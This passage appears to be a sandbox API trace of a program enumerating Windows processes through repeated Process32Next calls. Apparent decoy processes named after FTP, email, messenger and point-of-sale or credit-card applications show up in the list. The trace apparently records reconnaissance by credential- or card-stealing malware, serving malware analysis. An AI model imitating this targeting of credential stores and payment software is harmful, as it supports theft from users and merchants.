lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.642] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.644] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.646] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.649] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.651] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0164.654] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0164.657] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0164.659] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0164.661] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.663] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0164.705] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0164.707] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0164.709] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0164.713] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0164.715] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.717] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.719] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.721] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0164.724] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0164.726] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.728] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.730] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0164.733] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0164.738] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0164.740] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0164.743] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0164.744] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0164.782] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0164.785] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0164.787] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0164.789] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0164.792] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0164.794] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0164.797] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0164.800] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0164.802] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0164.804] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0164.807] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0164.813] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0164.815] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0164.817] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0164.820] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0164.823] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0164.829] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0164.833] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0164.836] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0164.839] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0164.842] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0164.845] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0164.847] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0164.850] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0164.853] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0164.857] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0164.859] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0164.862] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0164.957] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0164.960] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0164.962] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0164.965] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0164.967] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0164.979] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0164.982] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0164.984] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0164.986] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0164.989] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0164.991] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0164.993] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0164.994] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0164.996] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0164.999] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0165.000] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0165.003] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0165.004] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0165.010] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0165.011] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0165.013] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0165.016] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0165.019] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0165.021] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0165.024] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0165.026] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0165.028] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0165.030] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0165.031] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 